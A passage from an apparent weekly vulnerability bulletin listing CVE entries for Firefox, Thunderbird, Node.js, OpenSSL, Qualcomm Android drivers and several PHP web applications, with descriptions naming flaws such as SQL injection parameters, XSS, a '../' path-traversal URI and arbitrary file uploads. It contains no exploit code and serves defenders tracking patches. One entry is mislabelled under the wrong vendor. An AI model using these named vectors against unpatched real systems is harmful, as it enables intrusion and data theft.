CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A crash triggerable by web content in which an "ErrorResult" references unassigned memory due to a logic error. The resulting crash may be exploitable. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8. | 2018-06-11 | not yet calculated | CVE-2017-5401
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
If right-to-left text is used in the addressbar with left-to-right alignment, it is possible in some circumstances to scroll this text to spoof the displayed URL. This issue could result in the wrong URL being displayed as a location, which can mislead users to believe they are on a different site than the one loaded. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58. | 2018-06-11 | not yet calculated | CVE-2018-5117
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
File downloads encoded with "blob:" and "data:" URL elements bypassed normal file download checks through the Phishing and Malware Protection feature and its block lists of suspicious sites and files. This would allow malicious sites to lure users into downloading executables that would otherwise be detected as suspicious. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4. | 2018-06-11 | not yet calculated | CVE-2017-7814
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability in SMIL animation functions occurs when pointers to animation elements in an array are dropped from the animation controller while still in use. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53. | 2018-06-11 | not yet calculated | CVE-2017-5433
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur during font face manipulation when a font face is freed while still in use, resulting in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58. | 2018-06-11 | not yet calculated | CVE-2018-5104
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow in WebGL triggerable by web content, resulting in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53. | 2018-06-11 | not yet calculated | CVE-2017-5459
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
External resources that should be blocked when loaded by SVG images can bypass security restrictions through the use of "data:" URLs. This could allow for cross-domain data leakage. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6. | 2018-06-11 | not yet calculated | CVE-2016-9900
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An error in argument length checking in JavaScript, leading to potential integer overflows or other bounds checking issues. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50. | 2018-06-11 | not yet calculated | CVE-2016-5297
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A flaw in DRBG number generation within the Network Security Services (NSS) library where the internal state V does not correctly carry bits over. The NSS library has been updated to address this issue and Firefox ESR 52.1 has been updated with NSS version 3.28.4. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53. | 2018-06-11 | not yet calculated | CVE-2017-5462
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- thunderbird_and_firefox

A lack of parameter validation on IPC messages results in a potential out-of-bounds write through malformed IPC messages. This can potentially allow for sandbox escape through memory corruption in the parent process. This vulnerability affects Thunderbird < 52.7, Firefox ESR < 52.7, and Firefox < 59. | 2018-06-11 | not yet calculated | CVE-2018-5129
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- thunderbird
 
It is possible to execute JavaScript in the parsed RSS feed when the RSS feed is viewed as a website, e.g. via "View -> Feed article -> Website" or in the standard format of "View -> Feed article -> default format". This vulnerability affects Thunderbird < 52.5.2. | 2018-06-11 | not yet calculated | CVE-2017-7846
BID
SECTRACK
REDHAT
CONFIRM
MLIST
DEBIAN
CONFIRM
mozilla -- thunderbird
 
Plaintext of decrypted emails can leak through a user submitting an embedded form. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8. | 2018-06-11 | not yet calculated | CVE-2018-5185
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- thunderbird
 
Crafted CSS in an RSS feed can leak and reveal local path strings, which may contain the user name. This vulnerability affects Thunderbird < 52.5.2. | 2018-06-11 | not yet calculated | CVE-2017-7847
BID
SECTRACK
REDHAT
CONFIRM
MLIST
DEBIAN
CONFIRM
mozilla -- thunderbird
 
Plaintext of decrypted emails can leak through the src attribute of remote images, or links. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8. | 2018-06-11 | not yet calculated | CVE-2018-5162
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- thunderbird
 
Crafted message headers can cause a Thunderbird process to hang on receiving the message. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8. | 2018-06-11 | not yet calculated | CVE-2018-5161
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- thunderbird
 
It is possible to spoof the filename of an attachment and display an arbitrary attachment name. This could lead to a user opening a remote attachment which is a different file type than expected. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8. | 2018-06-11 | not yet calculated | CVE-2018-5170
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- thunderbird
 
It is possible to spoof the sender's email address and display an arbitrary sender address to the email recipient. The real sender's address is not displayed if preceded by a null character in the display string. This vulnerability affects Thunderbird < 52.5.2. | 2018-06-11 | not yet calculated | CVE-2017-7829
BID
SECTRACK
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- thunderbird
 
Using remote content in encrypted messages can lead to the disclosure of plaintext. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8. | 2018-06-11 | not yet calculated | CVE-2018-5184
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- thunderbird
 
RSS fields can inject new lines into the created email structure, modifying the message body. This vulnerability affects Thunderbird < 52.5.2. | 2018-06-11 | not yet calculated | CVE-2017-7848
BID
SECTRACK
REDHAT
CONFIRM
MLIST
DEBIAN
CONFIRM
mruby -- mruby
 
An issue was discovered in mruby 1.4.1. There is a heap-based buffer over-read associated with OP_ENTER because mrbgems/mruby-fiber/src/fiber.c does not extend the stack in cases of many arguments to fiber. | 2018-06-12 | not yet calculated | CVE-2018-12248
MISC
MISC
mruby -- mruby
 
An issue was discovered in mruby 1.4.1. There is a NULL pointer dereference in mrb_class, related to certain .clone usage, because mrb_obj_clone in kernel.c copies flags other than the MRB_FLAG_IS_FROZEN flag (e.g., the embedded flag). | 2018-06-12 | not yet calculated | CVE-2018-12247
MISC
MISC
mruby -- mruby
 
An issue was discovered in mruby 1.4.1. There is a NULL pointer dereference in mrb_class_real because "class BasicObject" is not properly supported in class.c. | 2018-06-12 | not yet calculated | CVE-2018-12249
MISC
MISC
nagios -- fusion
 
Nagios Fusion before 4.1.4 has XSS, aka TPS#13332-13335. | 2018-06-16 | not yet calculated | CVE-2018-12501
CONFIRM
naver -- whale
 
The path of the Whale update service was unquoted in NAVER Whale before 1.0.40.7. This vulnerability can be used for persistent privilege escalation if other vulnerable applications make it possible to create an executable file with System privilege. | 2018-06-15 | not yet calculated | CVE-2018-9859
CONFIRM
netapp -- santricity_web_services_proxy_and_santricity_storage_manager
 
NetApp SANtricity Web Services Proxy versions 1.10.x000.0002 through 2.12.X000.0002 and SANtricity Storage Manager 11.30.0X00.0004 through 11.42.0X00.0001 ship with the Java Management Extension Remote Method Invocation (JMX RMI) service bound to the network, and are susceptible to unauthenticated remote code execution. | 2018-06-13 | not yet calculated | CVE-2018-5488
BID
CONFIRM
nodejs -- node.js
 
All versions of Node.js 8.x, 9.x, and 10.x are vulnerable and the severity is HIGH. An attacker can cause a denial of service (DoS) by causing a node server providing an http2 server to crash. This can be accomplished by interacting with the http2 server in a manner that triggers a cleanup bug where objects are used in native code after they are no longer available. This has been addressed by updating the http2 implementation. | 2018-06-13 | not yet calculated | CVE-2018-7161
CONFIRM
nodejs -- node.js
 
Calling Buffer.fill() or Buffer.alloc() with some parameters can lead to a hang which could result in a Denial of Service. In order to address this vulnerability, the implementations of Buffer.alloc() and Buffer.fill() were updated so that they zero fill instead of hanging in these cases. All versions of Node.js 6.x (LTS "Boron"), 8.x (LTS "Carbon"), and 9.x are vulnerable. All versions of Node.js 10.x (Current) are NOT vulnerable. | 2018-06-13 | not yet calculated | CVE-2018-7167
CONFIRM
nodejs -- node.js
 
All versions of Node.js 9.x and 10.x are vulnerable and the severity is HIGH. An attacker can cause a denial of service (DoS) by causing a node process which provides an http server supporting TLS to crash. This can be accomplished by sending duplicate/unexpected messages during the handshake. This vulnerability has been addressed by updating the TLS implementation. | 2018-06-13 | not yet calculated | CVE-2018-7162
BID
CONFIRM
nodejs -- node.js
 
Node.js versions 9.7.0 and later and 10.x are vulnerable and the severity is MEDIUM. A bug introduced in 9.7.0 increases the memory consumed when reading from the network into JavaScript using the net.Socket object directly as a stream. An attacker could use this to cause a denial of service by sending tiny chunks of data in short succession. This vulnerability was resolved by reverting to the prior behaviour. | 2018-06-13 | not yet calculated | CVE-2018-7164
BID
CONFIRM
norton -- app_lock
 
Norton App Lock prior to version 1.3.0.329 can be susceptible to a bypass exploit. In this type of circumstance, the exploit can allow the user to circumvent the app to prevent it from locking the device, thereby allowing the individual to gain device access. | 2018-06-13 | not yet calculated | CVE-2018-5242
BID
CONFIRM
octopus -- deploy
 
In Octopus Deploy version 2018.5.1 to 2018.5.7, a user with Task View is able to view a password for a Service Fabric Cluster, when the Service Fabric Cluster target is configured in Azure Active Directory security mode and a deployment is executed with OctopusPrintVariables set to True. This is fixed in 2018.6.0. | 2018-06-11 | not yet calculated | CVE-2018-12089
CONFIRM
oecms -- oecms
 
A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php. | 2018-06-11 | not yet calculated | CVE-2018-12095
MISC
EXPLOIT-DB
opc_foundation -- local_discovery_server
 
OPC Foundation Local Discovery Server (LDS) 1.03.370 required a security update to resolve multiple vulnerabilities that allow attackers to trigger a crash by placing invalid data into the configuration file. This vulnerability requires an attacker with access to the file system where the configuration file is stored; however, if the configuration file is altered the LDS will be unavailable until it is repaired. | 2018-06-13 | not yet calculated | CVE-2017-17443
CONFIRM
opc_foundation -- local_discovery_server
 
The OPC Foundation Local Discovery Server (LDS) before 1.03.367 is installed as a Windows Service without adding double quotes around the opcualds.exe executable path, which might allow local users to gain privileges. | 2018-06-13 | not yet calculated | CVE-2017-11672
CONFIRM
opc_foundation -- opc_ua_.net_sample_applications
 
An issue was discovered in OPC UA .NET Standard Stack and Sample Code before GitHub commit 2018-04-12, and OPC UA .NET Legacy Stack and Sample Code before GitHub commit 2018-03-13. A vulnerability in OPC UA applications can allow a remote attacker to determine a Server's private key by sending carefully constructed bad UserIdentityTokens as part of an oracle attack. | 2018-06-13 | not yet calculated | CVE-2018-7559
CONFIRM
CONFIRM
CONFIRM
opc_foundation -- opc_ua_.net_sample_applications
 
Unsigned versions of the DLLs distributed by the OPC Foundation may be replaced with malicious code. | 2018-06-14 | not yet calculated | CVE-2017-12070
CONFIRM
open-xchange -- ox_app_suite
 
The backend component in Open-Xchange OX App Suite before 7.6.3-rev36, 7.8.x before 7.8.2-rev39, 7.8.3 before 7.8.3-rev44, and 7.8.4 before 7.8.4-rev22 allows remote authenticated users to obtain sensitive information about external guest users via vectors related to the "groups" and "users" APIs. | 2018-06-15 | not yet calculated | CVE-2018-5751
MISC
FULLDISC
EXPLOIT-DB
open-xchange -- ox_app_suite
 
The backend component in Open-Xchange OX App Suite before 7.6.3-rev36, 7.8.x before 7.8.2-rev39, 7.8.3 before 7.8.3-rev44, and 7.8.4 before 7.8.4-rev22 allows remote attackers to conduct server-side request forgery (SSRF) attacks via vectors involving non-decimal representations of IP addresses and special IPv6 related addresses. | 2018-06-15 | not yet calculated | CVE-2018-5752
MISC
FULLDISC
EXPLOIT-DB
open-xchange -- ox_app_suite
 
The backend component in Open-Xchange OX App Suite before 7.6.3-rev35, 7.8.x before 7.8.2-rev38, 7.8.3 before 7.8.3-rev41, and 7.8.4 before 7.8.4-rev19 allows remote authenticated users to save arbitrary user attributes by leveraging improper privilege management. | 2018-06-15 | not yet calculated | CVE-2017-17062
MISC
FULLDISC
EXPLOIT-DB
open-xchange -- ox_app_suite
 
The frontend component in Open-Xchange OX App Suite before 7.6.3-rev31, 7.8.x before 7.8.2-rev31, 7.8.3 before 7.8.3-rev41, and 7.8.4 before 7.8.4-rev20 allows remote attackers to spoof the origin of e-mails via unicode characters in the "personal part" of a (1) From or (2) Sender address. | 2018-06-15 | not yet calculated | CVE-2018-5753
MISC
FULLDISC
EXPLOIT-DB
open-xchange -- ox_app_suite
 
Absolute path traversal vulnerability in the readerengine component in Open-Xchange OX App Suite before 7.6.3-rev3, 7.8.x before 7.8.2-rev4, 7.8.3 before 7.8.3-rev5, and 7.8.4 before 7.8.4-rev4 allows remote attackers to read arbitrary files via a full pathname in a formula in a spreadsheet. | 2018-06-15 | not yet calculated | CVE-2018-5755
MISC
FULLDISC
EXPLOIT-DB
open-xchange -- ox_app_suite
 
Cross-site scripting (XSS) vulnerability in the office-web component in Open-Xchange OX App Suite before 7.8.3-rev12 and 7.8.4 before 7.8.4-rev9 allows remote attackers to inject arbitrary web script or HTML via a crafted presentation file, related to copying content to the clipboard. | 2018-06-15 | not yet calculated | CVE-2018-5754
MISC
FULLDISC
EXPLOIT-DB
open-xchange -- ox_app_suite
 
The backend component in Open-Xchange OX App Suite before 7.6.3-rev36, 7.8.x before 7.8.2-rev39, 7.8.3 before 7.8.3-rev44, and 7.8.4 before 7.8.4-rev22 does not properly check for folder-to-object association, which allows remote authenticated users to delete arbitrary tasks via the task id in a delete action to api/tasks. | 2018-06-15 | not yet calculated | CVE-2018-5756
MISC
FULLDISC
EXPLOIT-DB

openshift -- openshift_enterprise

routing before version 3.10 is vulnerable to an improper input validation of the Openshift Routing configuration which can cause an entire shard to be brought down. A malicious user can use this vulnerability to cause a Denial of Service attack for other users of the router shard. | 2018-06-12 | not yet calculated | CVE-2018-1070
CONFIRM
openshift -- openshift_enterprise
 
Openshift Enterprise source-to-image before version 1.1.10 is vulnerable to an improper validation of user input. An attacker who could trick a user into using the command to copy files locally, from a pod, could override files outside of the target directory of the command. | 2018-06-12 | not yet calculated | CVE-2018-1103
CONFIRM
openshift-ansible -- openshift-ansible
 
openshift-ansible before versions 3.9.23, 3.7.46 deploys a misconfigured etcd file that causes the SSL client certificate authentication to be disabled. Quotations around the values of ETCD_CLIENT_CERT_AUTH and ETCD_PEER_CLIENT_CERT_AUTH in etcd.conf result in etcd being configured to allow remote users to connect without any authentication if they can access the etcd server bound to the network on the master nodes. An attacker could use this flaw to read and modify all the data about the Openshift cluster in the etcd datastore, potentially adding another compute node, or bringing down the entire cluster. | 2018-06-15 | not yet calculated | CVE-2018-1085
CONFIRM
openssl -- openssl
 
During key agreement in a TLS handshake using a DH(E) based ciphersuite a malicious server can send a very large prime value to the client. This will cause the client to spend an unreasonably long period of time generating a key for this prime resulting in a hang until the client has finished. This could be exploited in a Denial Of Service attack. Fixed in OpenSSL 1.1.0i-dev (Affected 1.1.0-1.1.0h). Fixed in OpenSSL 1.0.2p-dev (Affected 1.0.2-1.0.2o). | 2018-06-12 | not yet calculated | CVE-2018-0732
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
ovirt-engine -- ovirt-engine
 
ovirt-engine up to version 4.2.3 is vulnerable to an unfiltered password when choosing manual db provisioning. When engine-setup was run and one chooses to provision the database manually or connect to a remote database, the password input was logged in cleartext during the verification step. Sharing the provisioning log might inadvertently leak database passwords. | 2018-06-12 | not yet calculated | CVE-2018-1075
CONFIRM
CONFIRM
pale_moon -- pale_moon
 
A use-after-free vulnerability exists in DOMProxyHandler::EnsureExpandoObject in Pale Moon before 27.9.3. | 2018-06-13 | not yet calculated | CVE-2018-12292
CONFIRM
phpok -- phpok
 
PHPOK 4.9.032 has an arbitrary file deletion vulnerability in the delfile_f function in framework/admin/tpl_control.php. | 2018-06-15 | not yet calculated | CVE-2018-12492
MISC
phpok -- phpok
 
PHPOK 4.9.032 has an arbitrary file upload vulnerability in the import_f function in framework/admin/modulec_control.php, as demonstrated by uploading a .php file within a .php.zip archive, a similar issue to CVE-2018-8944. | 2018-06-15 | not yet calculated | CVE-2018-12491
MISC
phpscriptsmall.com -- schools_alert_management_script
 
Arbitrary File Deletion exists in PHP Scripts Mall Schools Alert Management Script via the img parameter in delete_img.php by using directory traversal. | 2018-06-08 | not yet calculated | CVE-2018-12053
MISC
EXPLOIT-DB
phpscriptsmall.com -- schools_alert_management_script
 
Multiple SQL Injections exist in PHP Scripts Mall Schools Alert Management Script via crafted POST data in contact_us.php, faq.php, about.php, photo_gallery.php, privacy.php, and so on. | 2018-06-08 | not yet calculated | CVE-2018-12055
MISC
EXPLOIT-DB
phpscriptsmall.com -- schools_alert_management_script
 
SQL Injection exists in PHP Scripts Mall Schools Alert Management Script via the q Parameter in get_sec.php. | 2018-06-08 | not yet calculated | CVE-2018-12052
MISC
EXPLOIT-DB
phpscriptsmall.com -- schools_alert_management_script
 
Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal. | 2018-06-08 | not yet calculated | CVE-2018-12054
MISC
EXPLOIT-DB
pivotal_spring -- spring-flex
 
The Java implementations of AMF3 deserializers in Pivotal/Spring Spring-flex derive class instances from java.io.Externalizable rather than the AMF3 specification's recommendation of flash.utils.IExternalizable. A remote attacker with the ability to spoof or control an RMI server connection may be able to send serialized Java objects that execute arbitrary code when deserialized. | 2018-06-11 | not yet calculated | CVE-2017-3203
MISC
MISC
CERT-VN
BID
point-to-point_protocol_daemon -- point-to-point_protocol_daemon

Improper input validation together with an integer overflow in the EAP-TLS protocol implementation in PPPD may cause a crash, information disclosure, or authentication bypass. This implementation is distributed as a patch for PPPD 0.91, and includes the affected eap.c and eap-tls.c files. Configurations that use the `refuse-app` option are unaffected. | 2018-06-14 | not yet calculated | CVE-2018-11574
MLIST
portfoliocms -- portfoliocms
 
portfolioCMS 1.0.5 allows upload of arbitrary .php files via the admin/portfolio.php?newpage=true URI. | 2018-06-13 | not yet calculated | CVE-2018-12263
MISC
portfoliocms -- portfoliocms
 
portfolioCMS 1.0.5 has SQL Injection via the admin/portfolio.php preview parameter. | 2018-06-11 | not yet calculated | CVE-2018-12110
MISC
procps -- procps
 
procps-ng, procps is vulnerable to process hiding through a race condition. Since the kernel's proc_pid_readdir() returns PID entries in ascending numeric order, a process occupying a high PID can use inotify events to determine when the process list is being scanned, and fork/exec to obtain a lower PID, thus avoiding enumeration. An unprivileged attacker can hide a process from procps-ng's utilities by exploiting a race condition in reading /proc/PID entries. This vulnerability affects procps and procps-ng up to version 3.3.15; newer versions might also be affected. | 2018-06-13 | not yet calculated | CVE-2018-1121
MLIST
BID
CONFIRM
EXPLOIT-DB
MISC
public_knowledge_project -- open_journal_system
 
Cross-site scripting (XSS) vulnerability in Public Knowledge Project (PKP) Open Journal System (OJS) 3.X (before OJS 3.1.1-2) allows remote attackers to inject arbitrary web script or HTML via the templates/frontend/pages/search.tpl $authors parameter (aka the By Author field). | 2018-06-12 | not yet calculated | CVE-2018-12229
MISC
MISC
publiccms -- publiccms
 
An issue was discovered in PublicCMS V4.0.20180210. There is a "Directory Traversal" and "Arbitrary file read" vulnerability via an admin/cmsWebFile/list.html?path=../ URI. | 2018-06-15 | not yet calculated | CVE-2018-12493
MISC
publiccms -- publiccms
 
An issue was discovered in PublicCMS V4.0.20180210. There is a "Directory Traversal" and "Arbitrary file read" vulnerability via an admin/cmsTemplate/content.html?path=../ URI. | 2018-06-15 | not yet calculated | CVE-2018-12494
MISC
puppet -- puppet_agent
 
In Puppet Agent 1.10.x prior to 1.10.13, Puppet Agent 5.3.x prior to 5.3.7, Puppet Agent 5.5.x prior to 5.5.2, Facter on Windows is vulnerable to a DLL preloading attack, which could lead to a privilege escalation. | 2018-06-11 | not yet calculated | CVE-2018-6514
CONFIRM
puppet -- puppet_agent
 
Puppet Agent 1.10.x prior to 1.10.13, Puppet Agent 5.3.x prior to 5.3.7, and Puppet Agent 5.5.x prior to 5.5.2 on Windows only, with a specially crafted configuration file an attacker could get pxp-agent to load arbitrary code with privilege escalation. | 2018-06-11 | not yet calculated | CVE-2018-6515
CONFIRM
puppet -- puppet_enterprise_and_agent
 
Puppet Enterprise 2016.4.x prior to 2016.4.12, Puppet Enterprise 2017.3.x prior to 2017.3.7, Puppet Enterprise 2018.1.x prior to 2018.1.1, Puppet Agent 1.10.x prior to 1.10.13, Puppet Agent 5.3.x prior to 5.3.7, and Puppet Agent 5.5.x prior to 5.5.2, were vulnerable to an attack where an unprivileged user on Windows agents could write custom facts that can escalate privileges on the next puppet run. This was possible through the loading of shared libraries from untrusted paths. | 2018-06-11 | not yet calculated | CVE-2018-6513
CONFIRM
puppet -- puppet_enterprise_client_tools
 
On Windows only, with a specifically crafted configuration file an attacker could get Puppet PE client tools (aka pe-client-tools) 16.4.x prior to 16.4.6, 17.3.x prior to 17.3.6, and 18.1.x prior to 18.1.2 to load arbitrary code with privilege escalation. | 2018-06-14 | not yet calculated | CVE-2018-6516
CONFIRM
puppet -- puppet_enterprise
 
The previous version of Puppet Enterprise 2018.1 is vulnerable to unsafe code execution when upgrading pe-razor-server. Affected releases are Puppet Enterprise: 2018.1.x versions prior to 2018.1.1 and razor-server and pe-razor-server prior to 1.9.0.0. | 2018-06-11 | not yet calculated | CVE-2018-6512
CONFIRM
pvpgn -- stats
 
An issue was discovered in PvPGN Stats 2.4.6. SQL Injection exists in ladder/stats.php via the GET user parameter. | 2018-06-12 | not yet calculated | CVE-2017-18291
MISC
pvpgn -- stats
 
An issue was discovered in PvPGN Stats 2.4.6. SQL Injection exists in ladder/stats.php via the GET sort_direction parameter. | 2018-06-12 | not yet calculated | CVE-2017-18290
MISC
pvpgn -- stats
 
An issue was discovered in PvPGN Stats 2.4.6. SQL Injection exists in ladder/stats.php via the GET type parameter. | 2018-06-12 | not yet calculated | CVE-2017-18289
MISC
pvpgn -- stats
 
An issue was discovered in PvPGN Stats 2.4.6. SQL Injection exists in ladder/stats.php via the GET game parameter. | 2018-06-12 | not yet calculated | CVE-2017-18288
MISC
pvpgn -- stats
 
An issue was discovered in PvPGN Stats 2.4.6. SQL Injection exists in ladder/stats.php via the POST user_search parameter. | 2018-06-12 | not yet calculated | CVE-2017-18287
MISC
qemu -- qemu
 
m_cat in slirp/mbuf.c in Qemu has a heap-based buffer overflow via incoming fragmented datagrams. | 2018-06-13 | not yet calculated | CVE-2018-11806
MLIST
BID
CONFIRM
MLIST
MISC
qualcomm -- android

If userspace provides a too-large WPA RSN IE length in wlan_hdd_cfg80211_set_ie(), a buffer overflow occurs in all Android releases (Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the Linux kernel. | 2018-06-15 | not yet calculated | CVE-2018-5863
MISC
qualcomm -- android

The VMware AirWatch Agent for Android prior to 8.2 and AirWatch Agent for Windows Mobile prior to 6.5.2 contain a remote code execution vulnerability in real time File Manager capabilities. This vulnerability may allow for unauthorized creation and execution of files in the Agent sandbox and other publicly accessible directories such as those on the SD card by a malicious administrator. | 2018-06-11 | not yet calculated | CVE-2018-6968
BID
SECTRACK
CONFIRM
qualcomm -- android

The value of fix_param->num_chans is received from firmware and if it is too large, an integer overflow can occur in wma_radio_chan_stats_event_handler() for the derived length len leading to a subsequent buffer overflow in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel. | 2018-06-12 | not yet calculated | CVE-2017-15854
MISC
qualcomm -- android

Improper validation of array index in WiFi driver function sapInterferenceRssiCount() leads to array out-of-bounds access in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel. | 2018-06-12 | not yet calculated | CVE-2018-3576
MISC
qualcomm -- android

A stack-based buffer overflow can occur in fastboot from all Android releases (Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the Linux kernel. | 2018-06-15 | not yet calculated | CVE-2018-5854
MISC
qualcomm -- android

While processing a DSP buffer in an audio driver's event handler, an index of a buffer is not checked before accessing the buffer in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel. | 2018-06-12 | not yet calculated | CVE-2018-3572
MISC
qualcomm -- android

An arbitrary address write can occur if a compromised WLAN firmware sends incorrect data to WLAN driver in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel. | 2018-06-12 | not yet calculated | CVE-2018-5842
MISC
qualcomm -- android

Buffer overflow can occur due to improper input validation in multiple WMA event handler functions in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel. | 2018-06-12 | not yet calculated | CVE-2018-3582
MISC
qualcomm -- android

In the video driver function set_output_buffers(), binfo can be accessed after being freed in a failure scenario in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel. | 2018-06-12 | not yet calculated | CVE-2018-5844
MISC
qualcomm -- android
 
In the camera driver, an out-of-bounds access can occur due to an error in copying region params from user space in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel. | 2018-06-12 | not yet calculated | CVE-2017-15857
MISC
qualcomm -- android
 
In the WCD CPE codec, a Use After Free condition can occur in all Android releases (Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the Linux kernel. | 2018-06-15 | not yet calculated | CVE-2018-5857
MISC
qualcomm -- android
 
Early or late retirement of rotation requests can result in a Use After Free condition in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel. | 2018-06-12 | not yet calculated | CVE-2018-5847
MISC
qualcomm -- android
 
A buffer might be used after it is freed, because the mutex is unlocked before the buffer is freed, in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel. | 2018-06-12 | not yet calculated | CVE-2017-15842
MISC
qualcomm -- android
 
In the WLAN driver in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel, a buffer overwrite can occur if the vdev_id received from firmware is larger than max_bssid. | 2018-06-12 | not yet calculated | CVE-2018-3581
MISC
qualcomm -- android
 
In the function wma_pdev_div_info_evt_handler() in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel, there is no upper bound check on the value event->num_chains_valid received from firmware which can lead to a buffer overwrite of the fixed size chain_rssi_result structure. | 2018-06-12 | not yet calculated | CVE-2018-5843
MISC
qualcomm -- android
 
A user process can cause a kernel DoS in ashmem when performing a cache maintenance operation in all Android releases (Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the Linux kernel. | 2018-06-15 | not yet calculated | CVE-2017-18169
MISC
qualcomm -- android
 
In the MDSS driver in all Android releases (Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the Linux kernel, a data structure may be used without being initialized correctly. | 2018-06-15 | not yet calculated | CVE-2018-5860
MISC
qualcomm -- android
 
In the KGSL driver in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel, a Use After Free condition can occur when printing information about sparse memory allocations. | 2018-06-12 | not yet calculated | CVE-2018-3571
MISC
qualcomm -- android
 
Due to a race condition in the QTEECOM driver in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel, when more than one HLOS client loads the same TA, a Use After Free condition can occur. | 2018-06-12 | not yet calculated | CVE-2018-5849
MISC
qualcomm -- android
 
In wma_ndp_end_response_event_handler(), the variable len_end_rsp is a uint32 which can be overflowed if the value of variable "event->num_ndp_end_rsp_per_ndi_list" is very large which can then lead to a heap overwrite of the heap object end_rsp in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel. | 2018-06-12 | not yet calculated | CVE-2017-18070
MISC
qualcomm -- android
 
In the WLAN driver in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel, event->num_entries_in_page is a value received from firmware that is not properly validated which can lead to a buffer over-read. | 2018-06-12 | not yet calculated | CVE-2018-3579
MISC
qualcomm -- android
 
Due to a race condition in a bus driver, a double free in msm_bus_floor_vote_context() can potentially occur in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel. | 2018-06-12 | not yet calculated | CVE-2017-15843
MISC
qualcomm -- android
 
